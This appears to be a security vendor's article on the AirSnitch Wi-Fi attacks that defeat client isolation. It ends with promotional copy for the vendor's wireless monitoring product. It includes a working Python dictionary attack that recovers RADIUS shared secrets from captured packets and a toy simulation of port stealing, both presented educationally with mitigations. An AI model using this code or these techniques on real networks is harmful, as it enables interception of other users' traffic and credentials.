Researchers from the University of California, Riverside, and KU Leuven have demonstrated a novel wireless attack technique. The attack allows attackers on open guest networks to intercept a victim’s WPA2-Enterprise-protected traffic across access points sharing a wired distribution system.
The researchers have dubbed it “AirSnitch”, a family of Wi-Fi attacks that defeat client isolation, a widely deployed security feature meant to prevent devices on the same wireless network from attacking each other. They presented the attacks at the 2026 Network and Distributed System Security Symposium in San Diego. The attack affected every router and network the team tested, including enterprise-grade hardware from Cisco and LANCOM.
What the Attacks Enable
In many cases, these vulnerabilities enable a full MitM attack, allowing the attacker to see and modify data flowing between a victim device and the internet. Once the attacker establishes the MitM position, it can intercept all link-layer traffic, opening the door to higher-layer attacks. When traffic is unencrypted (Google recently estimated that 6 percent and 20 percent of pages loaded on Windows and Linux, respectively, still don’t use HTTPS), the attacker can view and modify everything in the clear, including authentication cookies, passwords, and payment information. Company intranets, which frequently use plaintext connections, are also exposed.
Even when HTTPS is in place, an attacker in a MitM position can intercept DNS lookup traffic, poison the victim’s DNS cache, redirect traffic via DHCP, or observe external IP addresses to determine which websites the victim visited. The researchers also demonstrated that, in their setup, the attacks can break RADIUS, the centralized authentication protocol used in enterprise networks: by intercepting RADIUS packets on the distribution system and brute-forcing the Message-Authenticator (an HMAC keyed with the RADIUS shared secret) offline, they recovered the shared secret. With that secret, an attacker can set up a rogue RADIUS server and a rogue access point and intercept the traffic and credentials of any legitimate client that connects.
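To make the RADIUS step concrete, the following is an added example (not the researchers’ code or the page’s own) showing why a single captured Access-Request is enough to test shared-secret guesses offline. The Message-Authenticator attribute is HMAC-MD5, keyed with the shared secret, over the packet with that attribute’s value zeroed (RFC 2869 §5.14), so each guess costs one HMAC. The packet, the EAP identity, the wordlist, the fixed Request Authenticator and both secrets are constructed here for the demonstration.

```python
"""Why an intercepted RADIUS Access-Request leaks a weak shared secret.
Added example: packet, identity, wordlist and secrets are constructed inline."""
import hashlib
import hmac
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_EAP_MESSAGE = 79
ATTR_MESSAGE_AUTHENTICATOR = 80

# Constructed, fixed Request Authenticator so the example is reproducible
# (a real NAS fills these 16 bytes with random data).
REQUEST_AUTHENTICATOR = bytes(range(0x10, 0x20))

# Constructed wordlist standing in for a dictionary an attacker would try.
WORDLIST = [b"password", b"radius", b"testing123", b"secret", b"changeme"]


def attribute(attr_type, value):
    """RADIUS attribute TLV: type, total length (including these two bytes), value."""
    return bytes([attr_type, len(value) + 2]) + value


def split_message_authenticator(packet):
    """Walk the attribute list starting after the 20-byte header and return
    (packet with the Message-Authenticator value zeroed, the observed value)."""
    out, observed, pos = bytearray(packet), None, 20
    while pos < len(packet):
        attr_type, length = packet[pos], packet[pos + 1]
        if length < 2:
            raise ValueError("malformed RADIUS attribute")
        if attr_type == ATTR_MESSAGE_AUTHENTICATOR:
            observed = bytes(packet[pos + 2:pos + length])
            out[pos + 2:pos + length] = bytes(16)
        pos += length
    return bytes(out), observed


def message_authenticator(secret, packet):
    """HMAC-MD5 keyed with the shared secret over the zeroed packet (RFC 2869 5.14)."""
    zeroed, _ = split_message_authenticator(packet)
    return hmac.new(secret, zeroed, hashlib.md5).digest()


def build_access_request(secret, identity, request_id=7):
    """Access-Request as an AP sends it for 802.1X: User-Name, EAP-Message carrying
    an EAP Response/Identity, and a Message-Authenticator computed over the packet."""
    eap = bytes([2, 1]) + struct.pack(">H", 5 + len(identity)) + bytes([1]) + identity
    attrs = (attribute(ATTR_USER_NAME, identity)
             + attribute(ATTR_EAP_MESSAGE, eap)
             + attribute(ATTR_MESSAGE_AUTHENTICATOR, bytes(16)))
    header = struct.pack(">BBH", ACCESS_REQUEST, request_id, 20 + len(attrs))
    unsigned = header + REQUEST_AUTHENTICATOR + attrs
    # The MA value is the last 16 bytes because its attribute was appended last.
    return unsigned[:-16] + message_authenticator(secret, unsigned)


def recover_secret(packet, candidates):
    """Offline dictionary search: the first candidate whose HMAC over the captured
    packet equals the Message-Authenticator the NAS actually sent, else None."""
    zeroed, observed = split_message_authenticator(packet)
    if observed is None:
        return None
    for candidate in candidates:
        guess = hmac.new(candidate, zeroed, hashlib.md5).digest()
        if hmac.compare_digest(guess, observed):
            return candidate
    return None


if __name__ == "__main__":
    weak = build_access_request(b"testing123", b"alice@example.edu")
    strong = build_access_request(b"Vq8!mZ2p#Lr7$Kd4@Xs9^Bn1wT3", b"alice@example.edu")
    print("weak secret recovered:", recover_secret(weak, WORDLIST))
    print("strong secret recovered:", recover_secret(strong, WORDLIST))
```

The check a practitioner wants here is simple: the shared secret between AP and RADIUS server must be long and random, not a word any list contains, and carrying RADIUS over TLS (RadSec, RFC 6614) keeps the exchange off the distribution system in the clear in the first place.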
How It Works
Unlike previous Wi-Fi attacks such as KRACK, which exploited a flaw in the WPA2 handshake itself, AirSnitch targets the failure to properly synchronize a client’s identity across different layers of the network stack: the 802.11 layer knows which station authenticated on which BSSID, but the AP’s internal switch and the gateway do not use that knowledge. The attacks exploit three main weaknesses.
First, most Wi-Fi implementations use a shared Group Temporal Key to protect broadcast and multicast communications. Even with client isolation enabled, all clients typically have access to this key. An attacker can abuse the GTK to wrap unicast IP traffic in a broadcast frame, spoofing the AP’s MAC address so the victim accepts the frame. Because these frames are delivered over the air rather than forwarded by the AP, the AP’s isolation restrictions cannot stop them. The Passpoint standard, designed for secure public hotspots, attempts to address this by randomizing GTKs per client, but the researchers found design flaws: the standard fails to require randomization of the GTK during several handshake types. It does not randomize a related key called the IGTK at all.
Second, many vendors enforce client isolation only at Layer 2 (the MAC/link layer) but not at Layer 3 (the IP layer). An attacker can send packets with the victim’s IP address as the destination, but the gateway’s MAC address as the Layer 2 destination. The gateway accepts and routes the packet back to the victim, effectively “bouncing” it around the isolation barrier: because the returned packet now arrives from the gateway’s port, it passes the Layer 2 isolation check as ordinary downlink traffic. The researchers call this gateway bouncing.
Third, and most critically, the attacks exploit a modern adaptation of a classic Ethernet attack called port stealing. In Wi-Fi networks, each BSSID functions as a virtualized switch port. By connecting to the network using a victim’s spoofed MAC address on a different BSSID, an attacker can trick the AP’s internal switch into redirecting the victim’s traffic to the attacker’s port. The AP then encrypts that traffic using the attacker’s own session keys, meaning the attacker can decrypt everything. In the worst case, when the attacker connects to an open SSID, the victim’s traffic is forwarded in plaintext, regardless of the victim’s original security configuration.
To achieve a full bidirectional MitM, the attacker alternates between stealing the victim’s port and restoring it, using techniques like ICMP ping injection to trigger port restoration, or coordinating with an external server to periodically restore the gateway’s port mapping. The researchers demonstrated the full attack completing in about two seconds on a Netgear R8000 while a victim watched a YouTube stream, experiencing no significant lag.
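The port-stealing and restoration steps above can be followed in a toy model of the AP’s internal learning bridge. The following is an added example, not the researchers’ code or any vendor’s firmware: the port names, MAC addresses, the isolation rule and the `pin_stations` cross-layer check are illustrative assumptions. It shows that client isolation does drop the attacker’s direct frame, that one frame carrying the victim’s MAC from the open BSSID moves the victim’s table entry onto the attacker’s port (where downlink traffic is then handed over in the clear), and that any frame the victim transmits afterwards relearns the original port, which is why the attacker alternates the two.

```python
"""Toy model of an AP's internal learning bridge showing port stealing and
restoration. Added example; ports, MACs and the pinning check are assumptions."""
from dataclasses import dataclass, field

VICTIM = "aa:aa:aa:00:00:01"    # constructed: client on the WPA2-Enterprise SSID
ATTACKER = "bb:bb:bb:00:00:02"  # constructed: attacker's own MAC on the open guest SSID
GATEWAY = "cc:cc:cc:00:00:ff"   # constructed: upstream router behind the AP's uplink


@dataclass
class Port:
    name: str
    wireless: bool
    encrypted: bool                       # False for an open SSID: frames leave in the clear
    delivered: list = field(default_factory=list)


@dataclass
class Frame:
    src: str
    dst: str
    payload: str


class LearningBridge:
    """One port per BSSID plus the wired uplink. As in a classic Ethernet switch, the
    forwarding table is learned from the source MAC of every ingress frame; nothing
    ties that MAC to the BSSID on which the station actually authenticated."""

    def __init__(self, ports, client_isolation=True, pin_stations=False):
        self.ports = {p.name: p for p in ports}
        self.table = {}          # MAC -> port name (learned)
        self.associated = {}     # MAC -> wireless port where it authenticated
        self.client_isolation = client_isolation
        self.pin_stations = pin_stations   # hypothetical fix: honour self.associated

    def receive(self, in_port, frame):
        ingress = self.ports[in_port]
        # Hypothetical cross-layer check: a MAC associated on one BSSID may not
        # be learned from another wireless port while that association stands.
        if self.pin_stations and ingress.wireless \
                and self.associated.get(frame.src, in_port) != in_port:
            return ("rejected_spoofed_source", None, None)
        self.table[frame.src] = in_port      # the weakness: unconditional learning
        out_name = self.table.get(frame.dst)
        if out_name is None:
            return ("flooded", None, None)
        egress = self.ports[out_name]
        if self.client_isolation and ingress.wireless and egress.wireless:
            return ("dropped_by_isolation", None, None)   # only wireless-to-wireless
        exposure = "encrypted" if egress.encrypted else "plaintext"
        egress.delivered.append((frame.payload, exposure))
        return ("delivered", out_name, exposure)


def run(pin_stations=False):
    """Replay the attack sequence; returns the outcome of each interesting frame."""
    bridge = LearningBridge(
        [Port("bssid-secure", wireless=True, encrypted=True),
         Port("bssid-open", wireless=True, encrypted=False),
         Port("uplink", wireless=False, encrypted=False)],
        pin_stations=pin_stations)
    bridge.associated[VICTIM] = "bssid-secure"
    bridge.associated[ATTACKER] = "bssid-open"
    steps = {}
    # 1. Normal traffic: the victim reaches the gateway and the bridge learns both MACs.
    bridge.receive("bssid-secure", Frame(VICTIM, GATEWAY, "victim uplink"))
    steps["downlink_before"] = bridge.receive("uplink", Frame(GATEWAY, VICTIM, "downlink #1"))
    # 2. Client isolation does block the attacker's direct frame to the victim.
    steps["direct"] = bridge.receive("bssid-open", Frame(ATTACKER, VICTIM, "direct probe"))
    # 3. Port stealing: one frame sent with the victim's MAC from the open BSSID
    #    moves the victim's table entry onto the attacker's port.
    steps["steal"] = bridge.receive("bssid-open", Frame(VICTIM, GATEWAY, "spoofed uplink"))
    steps["downlink_stolen"] = bridge.receive("uplink", Frame(GATEWAY, VICTIM, "downlink #2"))
    # 4. Restoration: a frame the victim transmits (here, the echo reply to a ping the
    #    attacker injected) relearns the MAC on the secure BSSID.
    bridge.receive("bssid-secure", Frame(VICTIM, GATEWAY, "echo reply"))
    steps["downlink_restored"] = bridge.receive("uplink", Frame(GATEWAY, VICTIM, "downlink #3"))
    return steps, bridge


if __name__ == "__main__":
    for name, outcome in run()[0].items():
        print(f"{name:18s} {outcome}")
```

With `pin_stations=True` the spoofed frame in step 3 is refused and the victim’s downlink never leaves the secure BSSID; that check stands in for the cross-layer identity synchronization the researchers describe as missing, and it is an assumption of this model rather than any vendor’s actual fix.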
What They Tested and Found Vulnerable
The researchers tested 11 devices: Netgear Nighthawk X6 R8000, Tenda RX2 Pro, D-Link DIR-3040, TP-Link Archer AXE75, ASUS RT-AX57, DD-WRT, OpenWrt, two Ubiquiti AmpliFi routers, a LANCOM LX-6500, and a Cisco Catalyst 9130. Every device they tested was vulnerable to at least one attack variant. They also tested two real university networks and successfully demonstrated downlink interception from a guest network against a WPA2-Enterprise protected SSID, with the intercepted traffic leaked in plaintext through the open guest network.
The attacks work across WPA2-Personal, WPA2-Enterprise, WPA3-Personal, and WPA3-Enterprise configurations. The cross-AP variant works wherever multiple access points share a wired distribution system, which is standard in enterprise and campus deployments.
Practical Implications
HD Moore, founder and CEO of runZero, noted that AirSnitch essentially restores the attack surface that existed before client isolation became common, comparable to the old days of ARP spoofing on open wireless networks.
Some router manufacturers have already released updates addressing portions of the attack surface. The Wi-Fi Alliance has fixed the missing IGTK randomization in Passpoint v3.4. But some vendors have told the researchers that they can only address certain underlying weaknesses by changing the hardware itself, and the lack of any industry-wide standard for client isolation means fixes will remain fragmented.
In an interview, lead researcher Xin’an Zhou said that this was likely just the beginning of the risks: “Advanced attacks can build on our primitives to [perform] cookie stealing, DNS, and cache poisoning. Our research physically wiretaps the wire altogether, so that these sophisticated attacks will work.”
Compounding the problem, many organizations lack full visibility into which wireless networks and devices are actually operating in their facilities. Rogue access points, misconfigured guest networks, and unauthorized devices connecting to legitimate SSIDs all create exactly the kind of network access that AirSnitch requires.
How to Mitigate AirSnitch
AirSnitch highlights a structural gap in enterprise wireless security. Organizations often rely on client isolation and segmentation, yet they lack continuous visibility into what actually operates across their RF spectrum. A single unmanaged guest network or unauthorized device can reintroduce risk across the broader environment.
Bastille delivers Wireless Airspace Cybersecurity through a 100% passive sensor architecture that monitors the radio-frequency environment from 100 MHz to 6 GHz and Wi-Fi to 7.125 GHz. The platform creates a real-time inventory of every wireless device and network operating within the wireless environment. Security teams gain immediate awareness of unauthorized devices, rogue access points, and unexpected associations across trusted infrastructure.
In the context of AirSnitch, that visibility changes the equation. An attacker must connect to the network, manipulate the behavior of the access point, and keep an active presence to hold a Man-in-the-Middle position. Bastille exposes those conditions by identifying unknown devices, anomalous association patterns, and suspicious network behavior as they occur.
The platform also provides wireless device localization using patented algorithms and analysis, enabling security teams to physically locate and remove malicious devices that attempt to maintain persistent access. By integrating wireless intelligence into zero-trust, CAASM, and XDR workflows, Bastille extends security operations into domains that traditional tools do not monitor.
Client isolation alone no longer provides sufficient protection. Organizations require continuous, independent visibility into the wireless environment to detect, investigate, and respond to threats that exploit architectural weaknesses. Bastille provides that foundational layer of awareness.
